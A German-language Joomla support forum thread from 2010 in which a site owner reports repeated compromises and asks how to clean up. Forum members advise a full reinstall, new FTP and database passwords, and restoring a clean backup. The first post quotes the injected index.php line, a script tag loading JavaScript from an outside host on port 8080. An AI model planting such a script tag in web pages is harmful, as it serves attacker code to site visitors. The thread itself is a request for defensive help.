Willkommen, Gast
Benutzername: Passwort: Angemeldet bleiben:
  • Seite:
  • 1

THEMA:

Joomla gehackt...immer wieder Java Scripts 19 Okt 2010 17:05 #27313

  • Hatemachine
  • Hatemachines Avatar Autor
  • Besucher
  • Besucher
Erst mal Hallo Zusammen.
Ich habe das Problem das einige Webseiten von mir gehackt wurden. Auf den zutreffenden Joomlas lief die Version 1.5.5 (glaube ich) nach den Angriffen habe ich die Seiten mühsam wider zum laufen gebracht und die neueste Version von Joomla aufgespielt.
Bei folgender Webseite, geschieht dieser Angriff nun wiederkehrend. D.h. so einmal pro Woche. Danach habe ich in der index.php datei folgender eintrag: "<script type="text/javascript" src=" amble.southamericasolar.com:8080/Cable_Modem.js ">
<!--2ccf728804bd11d51fed508d5ce0bd37" wobei das Ziel immer ändert. Ich denke nicht, dass ich der einzige habe der dieses Problem hat. Auf was muss ich Achten? wiso kann jemand meine index.php überschreiben?

Folgende Seite ist betroffen: http:www.berner-dental-labor.ch

Was braucht Ihr sonst noch für Informationen, damit wir dies gemeinsam anschauen können?
PS: Bei Kontakt wird möglicherweise versucht das Script auszuführen..

Gruss Tom

Bitte Anmelden oder Registrieren um der Konversation beizutreten.

Re: Joomla gehackt...immer wieder Java Scripts 20 Okt 2010 06:23 #27318

Hi Tom und willkommen im Forum

Du musst alles restlos löschen (Dateien und Datenbank). FTP- und Datenbank-Passwort ändern. Dann ein Backup zurückspielen. Dies die Kurzversion ;)

Das sollte dir weiterhelfen:
--ALTER LINK WURDE ENTFERNT--
InitCom: Webagentur für Webdesign // CMS Joomla! // PrestaShop

Bitte Anmelden oder Registrieren um der Konversation beizutreten.

Re: Joomla gehackt...immer wieder Java Scripts 20 Okt 2010 09:17 #27319

  • Hatemachine
  • Hatemachines Avatar Autor
  • Besucher
  • Besucher
Hallo Patrick
Gibt es dazu ein geeignetes Tool, oder muss ich das "Händisch" machen? Daten via FTP ab dem Serer kopieren neue Datenbank erstellen Joomla neu installieren entsprechende Dateien mit den alten ersetzen?

Danke für deine Antwort!

(Übringens: super Forum, kann ich das auch kriegen, resp. welches ist das?)

Gruss Tom

Bitte Anmelden oder Registrieren um der Konversation beizutreten.

Re: Joomla gehackt...immer wieder Java Scripts 20 Okt 2010 10:27 #27320

Tja, für solche Aufgaben gibt es --ALTER LINK WURDE ENTFERNT--. Die Idee wäre allerdings gewesen, eine frische Installation aus einem früheren Backup zu installieren. Wenn das Kind schon samt dem Bad ausgeschüttet wurde, kann ein nicht existierendes Backup nicht wirklich weiterhelfen.....
Joomla! 3: Professionelle Webentwicklung von David Jardin und Elisa Foltyn - das Standardwerk zu Joomla! 3
Wer nicht über den Anstand verfügt, ein kleines "Thänx" auszusprechen, muss sich nicht wundern, künftig ignoriert zu werden!
Kein Support via PM oder Mail. Entsprechende Anfragen werden ignoriert.

Bitte Anmelden oder Registrieren um der Konversation beizutreten.

Re: Joomla gehackt...immer wieder Java Scripts 20 Okt 2010 11:35 #27323

  • Hatemachine
  • Hatemachines Avatar Autor
  • Besucher
  • Besucher
:o das leuchtet ein...
Deine Aussage hilft mir aber nicht weiter. Falls du die Webseite besucht hättest, wüsstest du das diese wieder einwandfrei funktioniert! Also geht es darum die Fehler zu beseitigen. Hier wäre mir geholfen, wenn Du mir sagen könntest wie du vorgehen würdest, bei einem solchen Problem. G_O_O_D O_O_D

Nach Möglichkeit, ohne die Seite komplett neu zu machen!

Bitte Anmelden oder Registrieren um der Konversation beizutreten.

Re: Joomla gehackt...immer wieder Java Scripts 20 Okt 2010 14:49 #27326

Hatemachine schrieb: (Übringens: super Forum, kann ich das auch kriegen, resp. welches ist das?)

Scrolle mal ganz nach unten, da steht es inkl. Link ;)

Wenn eine Website gehackt wurde, hat man keine Ahnung was der Hacker gemacht hat, bzw. ob und wo er Dateien geändert oder zusätzliche eingeschleust hat.

Daher bleibt wirklich nur eine komplette Neuinstallation bzw. das Zurückspielen von einem Backup. Bei diesem muss man aber sicher sein, dass es sauber ist.

Wenn du kein Backup hast, frag deinen Provider danach. Die haben in der Regel täglich eines am laufen und können dir deine Website auf einen früheren Zustand zurücksetzen.
Aber auch da musst du absolut sicher sein, wann deine Installation noch i.O. war. Zudem wird der Provider dies nicht kostenlos machen.

Eine Turbolösung, einfach und bequem gibt es in diesem Fall leider nicht :(

Wie du genau vorgehen musst, steht in den Beiträgen unter dem Link den ich eingangs gepostet habe.

Eine gehackte Website bedeutet immer Aufwand und Umtriebe... ist leider so. :-\ \
InitCom: Webagentur für Webdesign // CMS Joomla! // PrestaShop

Bitte Anmelden oder Registrieren um der Konversation beizutreten.

  • Seite:
  • 1